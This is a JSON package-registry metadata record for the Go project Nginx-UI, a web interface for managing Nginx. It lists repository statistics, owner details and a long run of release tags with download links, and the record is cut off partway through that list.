{"id":4245042,"name":"github.com/0xJacky/Nginx-UI","ecosystem":"go","description":"","homepage":"https://github.com/0xJacky/Nginx-UI","licenses":"AGPL-3.0","normalized_licenses":["AGPL-3.0"],"repository_url":"https://github.com/0xJacky/Nginx-UI","keywords_array":[],"namespace":"github.com/0xJacky","versions_count":64,"first_release_published_at":"2022-01-27T07:04:27.000Z","latest_release_published_at":"2023-05-05T12:20:03.000Z","latest_release_number":"v1.9.9","last_synced_at":"2026-10-07T09:19:11.343Z","created_at":"2022-04-12T23:44:33.142Z","updated_at":"2026-10-07T14:18:36.608Z","registry_url":"https://pkg.go.dev/github.com/0xJacky/Nginx-UI","install_command":"go get github.com/0xJacky/Nginx-UI","documentation_url":"https://pkg.go.dev/github.com/0xJacky/Nginx-UI#section-documentation","metadata":null,"repo_metadata":{"id":37833107,"uuid":"340339997","full_name":"0xJacky/nginx-ui","owner":"0xJacky","description":"Yet another WebUI for Nginx","archived":false,"fork":false,"pushed_at":"2026-09-22T03:43:40.000Z","size":144655,"stargazers_count":11532,"open_issues_count":40,"forks_count":875,"subscribers_count":48,"default_branch":"dev","last_synced_at":"2026-09-22T04:22:10.845Z","etag":null,"topics":["code-completion","copilot","cron","docker","go","letsencrypt","linux","macos","mcp","mcp-server","nginx","self-hosted","vue","webui","windows"],"latest_commit_sha":null,"homepage":"https://nginxui.com","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0xJacky.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":".cursor/rules/backend.mdc","copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"github":"nginxui"}},"created_at":"2021-02-19T10:51:04.000Z","updated_at":"2026-09-22T03:43:45.000Z","dependencies_parsed_at":"2026-09-15T03:12:16.744Z","dependency_job_id":null,"html_url":"https://github.com/0xJacky/nginx-ui","commit_stats":null,"previous_names":[],"tags_count":220,"template":false,"template_full_name":null,"purl":"pkg:github/0xJacky/nginx-ui","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0xJacky","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/refs/heads/dev","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37613489,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-23T02:00:07.637Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"0xJacky","name":"Jacky","uuid":"13096985","kind":"user","description":"Full Stack Engineer","email":"","website":"https://jackyu.cn","location":"Shenzhen,China","twitter":null,"company":"Shenzhen Technology University","icon_url":"https://avatars.githubusercontent.com/u/13096985?u=818dca058c00808f6f850e392d057c7d0f2b0b95\u0026v=4","repositories_count":12,"last_synced_at":"2023-03-03T21:10:36.644Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/0xJacky","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:35:01.239Z","updated_at":"2023-03-03T21:10:36.652Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0xJacky","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0xJacky/repositories"},"tags":[{"name":"v2.6.3","sha":"826c6fae830168ccb8015f6d6c01fbf476b05ea9","kind":"tag","published_at":"2026-09-20T09:17:06.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.6.3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"6e55a749a550c5c809082bbc596578c55936f5b7","kind":"tag","published_at":"2026-09-20T06:47:01.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.6.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"7ed4fc4a7fde8791df6b8c8f828e6f571df1832f","kind":"tag","published_at":"2026-09-16T05:09:18.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.6.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0189e7bb61ce1f11186a4cf7c00dcbd2bd092ed6","kind":"tag","published_at":"2026-09-14T06:28:57.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.6.0","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.6.0/manifests"},{"name":"v2.5.10","sha":"ff2253c59cdbfc0741866cd66a1f147ad8292791","kind":"tag","published_at":"2026-08-21T04:36:48.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.5.10","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.5.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.5.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.10/manifests"},{"name":"v2.5.9","sha":"1ccd1c06b3ebde648d4589836f5274953abf652d","kind":"tag","published_at":"2026-08-14T14:56:26.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.5.9","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.5.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.5.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.9/manifests"},{"name":"v2.5.8","sha":"5871566fb914ebb8460e8ec5f56dfbef3d07f51e","kind":"tag","published_at":"2026-08-13T02:34:48.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.5.8","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.8/manifests"},{"name":"v2.5.7","sha":"90e896810699c7e407cb39015419814f2b85b725","kind":"tag","published_at":"2026-08-12T07:50:14.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.5.7","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.7/manifests"},{"name":"v2.5.6","sha":"ab6312550558f60af03f72ecf6c0ba125746bf26","kind":"tag","published_at":"2026-07-31T03:54:09.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.5.6","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"3985eb17e5e5b87296429bd321bcfd17ff44905d","kind":"tag","published_at":"2026-07-31T03:25:29.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.5.5","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"9fd24af6b7d926bee44ae1f51bee8da38dc3cba2","kind":"tag","published_at":"2026-07-31T02:58:54.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.5.4","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"9506d84bf7346a31c038f4bb64f67fb08291b1e2","kind":"tag","published_at":"2026-07-31T02:20:01.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.5.3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.3/manifests"},{"name":"v2.5.2","sha":"b49114896e9f411b53a55edfbb62034cad3d523f","kind":"tag","published_at":"2026-07-29T10:49:04.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.5.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"bdf2aa3f95b4cd31d24330776b846b93cde8a18a","kind":"tag","published_at":"2026-07-29T09:56:19.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.5.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"acb59fdd81dbdd60abd0004e9ade573186a3be43","kind":"tag","published_at":"2026-07-29T08:41:04.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.5.0","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.5.0/manifests"},{"name":"v2.4.3","sha":"eb9495bdf4d98075bc00f221c7731d6f9f0b0a26","kind":"tag","published_at":"2026-07-21T00:32:51.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.4.3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"289d341da6a0dc1abb84a7cf3cf3639783e603ec","kind":"tag","published_at":"2026-07-07T07:03:46.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.4.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.4.2/manifests"},{"name":"v2.4.1","sha":"0540f3ecf7824e9adbe408f3166d151651ccf4dd","kind":"tag","published_at":"2026-07-03T13:48:19.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.4.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"4d4a7cd7b58f85eb0c18164ea89f8b96d46d5522","kind":"tag","published_at":"2026-06-26T08:04:27.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.4.0","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.4.0/manifests"},{"name":"v2.3.11","sha":"6c86e5a59454890a7ff2417540324857e966990d","kind":"tag","published_at":"2026-05-17T09:31:10.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.3.11","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.11/manifests"},{"name":"v2.3.10","sha":"06623534202e5a9620b32c57316325f8b46e4230","kind":"tag","published_at":"2026-04-28T04:37:54.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.3.10","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.10/manifests"},{"name":"v2.3.9","sha":"30908f3c28d777c0be7cd2611f7d29145ff76752","kind":"tag","published_at":"2026-04-27T06:07:26.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.3.9","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.9/manifests"},{"name":"v2.3.8","sha":"7864e378f5cf8013c4df38c15e57480f5c2db1d7","kind":"tag","published_at":"2026-04-21T07:15:57.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.3.8","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.8/manifests"},{"name":"v2.3.7","sha":"a67285b713d56229c7841a9b451bc333dbd6cf0f","kind":"commit","published_at":"2026-04-18T11:04:41.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.3.7","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"335fc66c9095084c70e05af198c90e6261be36b3","kind":"commit","published_at":"2026-04-08T01:52:13.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.3.6","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"1a9cd29a308278173aa0f16234cb78061dd2bd42","kind":"commit","published_at":"2026-03-16T05:33:37.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.3.5","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"20412b5b54f9e0473d5fbd10a964f4f3035c5521","kind":"commit","published_at":"2026-03-15T14:20:29.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.3.4","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"e5da6dd96dae5567a7aaa27a4000a4762696d89c","kind":"commit","published_at":"2026-02-15T00:55:30.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.3.3","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"cb1fb691aff413a3bf322a5e48bd51c299051724","kind":"commit","published_at":"2025-12-09T09:35:47.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.3.2","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f725462e844495a8e14c5038364c6b7df84b5813","kind":"commit","published_at":"2025-12-09T08:20:59.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.3.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"bc5351092ab9c91792c4ea9114f55618736adede","kind":"commit","published_at":"2025-12-09T03:49:41.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.3.0","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"fdea3940d86459661166ef2c7a00204544ed9b9b","kind":"commit","published_at":"2025-11-25T05:56:10.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.2.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.2.1/manifests"},{"name":"v2.2.0-patch.1","sha":"372af98307df195a061c650c43505fed42fa279b","kind":"commit","published_at":"2025-10-05T05:55:06.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.2.0-patch.1","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.2.0-patch.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.2.0-patch.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.2.0-patch.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.2.0-patch.1/manifests"},{"name":"v2.2.0","sha":"6de168c9454c165d7a09c6a821a2244f1ecf61e2","kind":"commit","published_at":"2025-10-05T00:56:31.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.2.0","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.2.0/manifests"},{"name":"v2.1.17","sha":"876213ad12449216d82520b3808b59cdaf0e1276","kind":"commit","published_at":"2025-08-06T03:51:02.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.17","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.17/manifests"},{"name":"v2.1.16","sha":"aa785aa13f2a8d84a9573a131492a814136a07fd","kind":"commit","published_at":"2025-08-03T14:16:51.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.16","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.16/manifests"},{"name":"v2.1.15","sha":"35ea8876bd6a635e84e2d6b09a86eac420928718","kind":"commit","published_at":"2025-08-03T09:51:05.000Z","download_url":"https://codeload.github.com/0xJacky/nginx-ui/tar.gz/v2.1.15","html_url":"https://github.com/0xJacky/nginx-ui/releases/tag/v2.1.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/0xJacky/nginx-ui@v2.1.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xJacky%2Fnginx-ui/tags/v2.1.15/manifests"},{"name":"v2